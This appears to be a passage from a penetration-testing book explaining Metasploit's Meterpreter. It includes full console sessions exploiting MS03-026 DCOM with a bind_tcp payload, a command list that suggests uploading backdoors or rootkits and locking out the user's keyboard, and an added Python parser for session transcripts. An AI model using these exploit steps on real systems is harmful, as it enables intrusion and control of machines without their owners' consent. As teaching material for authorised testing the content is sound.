When you successfully exploit a remote computer, the next task is to interact with the system in order to further your goals, whatever they may be. The most common form of interaction is entering textual commands into a remote command shell. Unix-style operating systems such as Linux or Mac OS X have rich command shells that provide a powerful environment for further system control. Windows, on the other hand, has a command shell left over from the DOS days that provides very limited functionality.
One way around the limited command shell of Windows is to use the VNC payload (see Choosing a Payload), which gives you a graphical interface to the compromised computer. However, the VNC payload has some drawbacks. VNC connections require relatively high bandwidth in order to be useable. If the compromised computer is on a low bandwidth connection or is located on the other side of the world, the VNC connection may be so slow as to be worthless. Using VNC also can give you away—any interaction you take with the remote computer will be displayed on its monitor. If someone happens to be in front of the computer while you're trying to control it with VNC, your presence will be detected very quickly.
In order to address the shortcomings of the traditional shell and VNC payloads, Metasploit includes a special payload for Windows called the Meterpreter. The Meterpreter is a rich command shell for Windows that provides many commands missing from the normal Windows shell, as well as a few additional capabilities geared specifically for exploitation.
You use the Meterpreter by selecting one of its variants as the payload for an exploit. If the exploit succeeds, you'll be presented with the Meterpreter prompt:
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.150.9.46:60090 -> 10.157.6.231:4444)
[*] The DCERPC service did not reply to our request
meterpreter >
The Meterpreter has a large list of commands, some of which aren't discussed here, and new commands can be added at any time. To get a complete list of these commands, type help or ? from the Meterpreter prompt. To learn more about a specific command, you can type commandname -h. Some simple commands don't support the -h flag, but the complex ones typically do.
Here are some useful Meterpreter commands:
sysinfo
Displays useful information about the host you've just exploited, including the computer's name, operating system, and patchlevel.
pwd
Displays the current working directory. This typically starts out as the Windows system directory.
cd
Changes the current working directory. This command accepts both DOS- and Unix-style path arguments (i.e., cd c:\ and cd / both perform the same operation).
ls
Displays a listing of the files in the current working directory. The output is much closer to that of the Unix ls than that of the Windows dir command.
cat
Prints the contents of a file to the screen, just as cat on a Unix system would.
download
Copies the contents of a file from the remote system to the local (the computer running Metasploit) filesystem. You can use this feature to download valuable information for offline analysis.
upload
Uploads a file from the local filesystem to the remote computer. You can use this command to upload backdoors, rootkits (see Chapter 12), or Trojaned versions of binaries already on the system.
edit
Opens the contents of a file for you to edit. One very nice feature of the edit command is that it opens the file on the local computer using the editor of your choice.
execute
Executes a file on the remote computer from its filesystem. This can either be a pre-existing file or one you've recently uploaded.
ipconfig
Displays the network settings of the remote computer.
getpid
Displays the current PID (process ID) of the process hosting the Meterpreter. This is likely the vulnerable process you exploited in order to run the Meterpreter.
getuid
Displays the username of the owner of the process. The user determines what control you have over the remote computer. Normal users can typically modify only their own files, while an administrator usually has full control over the system. The special user named SYSTEM has the highest privilege level obtainable.
ps
Displays a list of all the processes currently running on the remote computer along with a PID (process ID).
kill
Kills a process. The argument to the kill command is a PID you received from either getpid or ps. (Killing the PID value you received from getpid without first migrating the process will almost certainly cause your Meterpreter session to close, as you've just killed the Meterpreter's process.)
migrate
Migrates the Meterpreter code and thread of execution to a different process, all without disrupting the Meterpreter console in the slightest. If the process you exploited is not trustworthy, you can use this command to migrate to something more stable.
portfwd
Similar to SSH tunneling (see Chapter 15), this command lets you open a port on the local computer that will be tunneled via Meterpreter to a remote computer and port. You can use this functionality to progressively work further into a network, computer by computer, just as you can with Core Impact (see Task Overview through The Canvas Exploit Framework).
reg
Lets you view or modify the Windows registry on the remote computer. Almost all of Windows' settings are in the registry (from password policies to firewall settings), so modification allows for some interesting possibilities.
idletime
Displays the amount of time the computer has been "idle" (i.e., no one has been moving the keyboard or mouse). You can use this feature to try to time disruptive actions (e.g., rebooting the computer) for when the computer is unattended.
uictl
Allows you to disable (or re-enable) the keyboard or mouse on the remote computer. You can use this to temporarily prevent the computer's user from taking any action (perhaps to get rid of you, for example).
irb
Spawns an interactive Ruby shell. From this shell, you can interact with Meterpreter's internals and script its behavior directly by using its API.
run
Similar to the irb command, but it runs a Ruby script from the local filesystem instead of giving you an interactive shell.
quit
Quits the Meterpreter session, closing the network connection and returning you to the Metasploit prompt.
Here's an example of Metasploit being used to launch a Meterpreter session on the remote computer Yakima:
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST yakima
RHOST => yakima
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.150.9.46:60603 -> 10.157.6.231:4444)
[*] The DCERPC service did not reply to our request
meterpreter > sysinfo
Computer: YAKIMA
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter > pwd
c:\windows\system32
meterpreter > ls calc*
Listing: calc*
==============
Mode              Size    Type  Last modified                 Name
----              ----    ----  -------------                 ----
100777/rwxrwxrwx  114688  fil   Mon Mar 31 05:00:00 PST 2003  calc.exe
meterpreter > execute calc.exe
[-] You must specify an executable file with -f
meterpreter > execute -f calc.exe
Process 652 created.
meterpreter > getpid
Current pid: 920
meterpreter > migrate 652
[*] Migrating to 652...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 652
meterpreter > kill 652
Killing: 652
[-] Error while running command kill: execution expired
meterpreter > quit
[*] Meterpreter session 1 closed.
msf exploit(ms03_026_dcom) >
In the preceding example, we first gather some information about the system. Then we find a program on the remote filesystem and execute it. We next migrate the Meterpreter session to the new process. Finally, to demonstrate that the migration worked, we kill the process we migrated to and notice that the session has timed out.
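A session like the one above leaves a console transcript that is the only record of which processes on the host carried the payload and which ones were launched, and an engagement report or incident-response handover needs exactly that list so those processes can be examined. The following Python parser is an added example, not code from the book or from Metasploit; it reads the message formats shown on this page and builds that record from a constructed sample transcript modelled on the session above.

```python
import re

# Constructed sample transcript, shaped like the console session on this page.
SAMPLE = """\
[*] Uploading DLL (73739 bytes)...
[*] Meterpreter session 1 opened (10.150.9.46:60603 -> 10.157.6.231:4444)
meterpreter > getpid
Current pid: 920
meterpreter > execute -f calc.exe
Process 652 created.
meterpreter > migrate 652
[*] Migrating to 652...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 652
meterpreter > kill 652
Killing: 652
[*] Meterpreter session 1 closed.
"""

# Each regex recognises one console message worth keeping in the activity record.
PATTERNS = {
    "session_open": re.compile(r"Meterpreter session (\d+) opened \((\S+) -> (\S+)\)"),
    "session_close": re.compile(r"Meterpreter session (\d+) closed"),
    "upload": re.compile(r"Uploading (\S+) \((\d+) bytes\)"),
    "pid": re.compile(r"^Current pid: (\d+)$"),
    "spawned": re.compile(r"^Process (\d+) created\.$"),
    "migrate_start": re.compile(r"Migrating to (\d+)"),
    "migrate_done": re.compile(r"Migration completed successfully"),
    "killed": re.compile(r"^Killing: (\d+)$"),
}

def summarize(transcript):
    events, hosting, spawned, pending = [], set(), set(), None  # hosting = PIDs that ran the payload
    for line in transcript.splitlines():
        for kind, rx in PATTERNS.items():
            if not (m := rx.search(line)):
                continue
            events.append((kind, *m.groups()))
            if kind == "pid":
                hosting.add(int(m.group(1)))
            elif kind == "spawned":
                spawned.add(int(m.group(1)))        # launched by the operator via execute
            elif kind == "migrate_start":
                pending = int(m.group(1))           # counts only once the console confirms it
            elif kind == "migrate_done" and pending is not None:
                hosting.add(pending)
                pending = None
            break
    return {"events": events, "hosting_pids": sorted(hosting), "spawned_pids": sorted(spawned)}
```

On the sample, the record shows that both PID 920 (the exploited process) and PID 652 (calc.exe, reached by migrate) hosted the payload, which is why killing 652 ended the session.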